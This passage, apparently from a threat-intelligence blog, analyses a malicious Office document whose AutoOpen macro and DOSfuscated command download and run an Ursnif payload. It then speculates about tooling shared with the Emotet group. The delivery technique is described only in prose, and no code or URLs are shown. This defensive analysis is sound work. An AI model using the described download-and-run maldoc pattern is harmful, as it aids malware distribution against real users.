It’s got a pile of VBA inside too!
Hmm. Okay, this looks familiar. The AutoOpen() block is a tiny bit different, using Shell% instead, but it’s pretty close to the same thing at the end of the day. Let’s see what that string evaluates to.
Again with the DOSfuscation! That stuff unpacks to running:
Well. Look at that. The same script we saw earlier, more or less.
It’s taking a list of URLs in $Apq and downloading them as “150.exe” and running them…
There’s only one url in the url list, but it’s splitting the URL list on “@”?
Why would you do that?
Clearly someone here has used the same tool as before to push a malware download URL, but what’s on the other end of this URL?
It turns out this is an Ursnif sample. Which is weird and cool, because it’s being delivered in something that might as well be an Emotet maldoc.
I wonder how that happened. No, really, I wonder how that happened. You see, we’ve observed a few things with Emotet.
We know that they mostly drop their own banking malware from their URL quintets, but occasionally they will load up their own spam tools to send their maldocs out, and sometimes they will even distribute PandaBanker or the TrickBot trojan instead.
We’ve seen prior “versions” of Emotet manifesting as two parallel sets of distribution infrastructure, originally distributing different malware. This has recently morphed into a single infrastructure that generally distributes only one kind of thing at a time; although it has been occasionally observed to distribute different download URLs in parallel during the same time window, suggesting a capability to run multiple campaigns contemporaneously.
Clearly, this Ursnif sample isn’t being served from the Emotet group’s distribution infrastructure, but it’s very interesting nonetheless. Did a third party write the tool that creates the maldoc from a template and contains the payload URLs and both of these groups obtained it? Did the Emotet group write that tool for their own purposes, and then they sold it to the Ursnif group (or the Ursnif group obtained it through some means)? Was this a test run for a campaign by the Emotet group to embed a link to the Ursnif group’s payload infrastructure in their own spam email delivery?
We can’t really know, but it’s something to watch for.